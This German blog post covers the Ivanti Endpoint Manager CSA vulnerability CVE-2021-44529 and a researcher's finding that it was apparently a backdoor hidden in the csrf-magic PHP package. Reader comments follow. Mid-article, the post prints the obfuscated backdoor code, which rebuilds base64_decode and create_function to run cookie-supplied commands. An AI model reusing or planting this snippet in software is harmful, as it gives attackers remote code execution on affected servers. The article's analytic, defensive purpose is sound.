[English]Neuer Schwank rund um den Ivanti Endpoint Manager. Im Jahr 2021 wurde von Ivanti im Produkt eine als „Code Injection“ bezeichnete Sicherheitslücke CVE-2021-44529 geschlossen. Es gab Gerüchte, dass es sich um einen Backdoor (Hintertür) in einem Open-Source-Projekt handelte. Ein Sicherheitsforscher hat sich darauf hin den Code nochmals genauer angesehen und erstaunliche Erkenntnisse gewonnen.
CVE-2021-44529 in Ivanti Endpoint Manager
Ich hatte es hier im Blog nicht thematisiert, da Ivanti 2021 bei mir noch nicht auf dem Radar war (kam erst mit dem Hack von Norwegens Regierungen, siehe Norwegens Regierung über Ivanti-Zero-Day gehackt und die Links am Artikelende). Am 8. Dezember 2021 gab es eine Warnung zur Schwachstelle CVE-2021-44529. Es war eine Code-Injection-Schwachstelle in der Ivanti EPM Cloud Services Appliance (CSA) bekannt geworden. Diese erlaubt es, einem nicht-authentifizierten Benutzer, beliebigen Code mit eingeschränkten Rechten (nobody) auszuführen.
Das betraf den Ivanti Endpoint Manager CSA Version 4.5 und 4.6. Ivanti hatte am 2. Dezember 2021 dieses Security Advisory herausgegeben. Dort finden sich auch Hinweise auf Updates und Gegenmaßnahmen. Von PacketStorm-Security gab es dann zum 18. Januar 2023 noch einen Folgebeitrag zur Schwachstelle, der einen Metasploit für die Schwachstelle enthielt.
Backdoor oder Code-Injection-Schwachstelle?
Gerade bin ich über nachfolgenden Tweet auf eine neue Information gestoßen. Ron Bowes von Greynoise Labs hat sich die Schwachstelle und den Quellcode nochmals angeschaut. Dies war möglich, weil Ivanti Open Source Software in seinem Produkt verwendet hat. Hintergrund war, dass Sicherheitsexperte Tuan Anh Nguyen im März 2022 schrieb, dass er sich sicher sei, dass die Schwachstelle als Backdoor in die Software gekommen ist. Nachfolgender Tweet legt den Punkt bereits offen:
Ron Bowes ist diesem Verdacht nachgegangen, hat recherchiert und hat sich über die Way Back Machine den Code des betreffenden Pakets genauer angegeben. Es handelt sich, wenn ich es richtig verstanden habe, um csrf-magic, ein Paket, welches einen Cross-Site-Request-Forgery-Angriff in PHP verhindern soll. Über die Way Back Machine ist er auf ein Archiv vom März 2022 gestoßen, aber der letzte Commit war vom Februar 2014.
Dann begann der Sicherheitsforscher den Quellcode nach einer Backdoor zu durchsuchen. Seine Vermutung war, dass die Backdoor sorgfältig im Code versteckt sein wurde. Aber er wurde am Ende der Datei im Quellcode fündig.
// Obscure Tokens $aeym="RlKHfsByZWdfcmVwfsbGFjZShhcnJheSgnLfs1teXHc9fsXHNdLyfscsJy9fsccy8nfsKSwgYXJyfsYXkoJycsfsJysn"; $lviw = str_replace("m","","msmtmr_mrmemplmamcme"); $bbhj="JGMofsJGEpPjMpefsyRrPSdjMTIzJzfstlfsY2hvICc8Jy4kay4nPic7ZXfsZfshbChiYXNlNjRfZGVjb2"; $hpbk="fsJGfsM9fsJ2NvdW50fsJzfsskYfsT0kXfs0NPT0tJRTtpZihyfsZfsXNldfsCgfskYfsSkfs9fsPSdhYicgJiYg"; $rvom="KSwgam9pbihhcnfsJheV9zbGljZSgkYSwkYyfsgkYSktMyfskpfsKSkpOfs2VjaG8gJzwvJy4fskay4nPic7fQ=="; $xytu = $lviw("oc", "", "ocbocaocseoc6oc4_ocdoceoccocoocdoce"); $murp = $lviw("k","","kckrkeaktkek_kfkunkcktkikokn"); $zmto = $murp('', $xytu($lviw("fs", "", $hpbk.$bbhj.$aeym.$rvom))); $zmto();
Er begann den obigen Code zu analysieren und kam zum Schluss, dass dort die Backdoor sei. Diese benötigt mindestens 4 Cookies für den Code Injection-Angriff. Das erste Cookie muss den Wert „ab“ haben, und die letzten drei Cookies werden verkettet, als leicht verschlüsselte base64 dekodiert und ausgeführt. Ron Bowes hat seine Erkenntnisse im Beitrag Code injection or backdoor: A new look at Ivanti’s CVE-2021-44529 veröffentlicht.
Im schlechtesten Fall steckte die Schwachstelle CVE-2021-44529, letztendlich wohl eine Backdoor, bereits seit sieben Jahren im Open Source Modul. Und es scheint recht einfach zu sein, einen Exploit für diese Schwachstelle zu schreiben. Wie dieser Code in das Projekt gekommen ist und warum das nicht auffiel, blieb im Dunkeln. Aber der Fall zeigt, dass Ivanti die Sicherheit mit seinen Produkten nicht im Griff hat – ich hatte ja im Beitrag Kleine Warnung: Finger weg von Ivanti VPN; die benutzen wohl Uralt-Tools mit bereits einen anderen Fall aufgegriffen – was später auch anderen Sicherheitsforschern auffiel (siehe Ivantis uralter Software-Klump – fällt auch Sicherheitsforschern auf).
Ähnliche Artikel:
Norwegens Regierung über Ivanti-Zero-Day gehackt
Ivanti bestätigt 2. Schwachstelle CVE-2023-35081 bei Hack der norwegischen Regierung
Diensttelefone des Digitalministeriums über Ivanti-Schwachstellen angreifbar
Schwachstelle CVE-2023-35082 in Ivanti MobileIron Core (bis Version 11.2)
Warnung vor Schwachstellen; Fortinet, Ivanti und mehr (Januar 2024)
Tausende Geräte per Ivanti VPN-Schwachstellen angegriffen – mind. 19 in Deutschland
Massive Angriffswelle auf Ivanti VPN-Appliances; Warnung, Konfigurations-Pushes kann Härtungsmaßnahmen gefährden
Ivanti Connect Secure: Neue Schwachstellen CVE-2024-21888 und CVE-2024-21893 gepatcht
Kleine Warnung: Finger weg von Ivanti VPN; die benutzen wohl Uralt-Tools mit
Ivantis uralter Software-Klump – fällt auch Sicherheitsforschern auf
Ivanti… die Unterstützen auch keine Extended Protection auf Exchange für Sentry/MobileIron…
Sowie nicht bei der SCEP Role für Zertifikate, wenn auf IIS EP aktiviert ist.
Kann ich nicht bestätigen! Welche Probleme haben Sie?
Tuan schreibt auf Twitter, er habe mittlerweile mehr als 1 Mio USD mit Bug Bounty-Meldungen verdient. Respekt.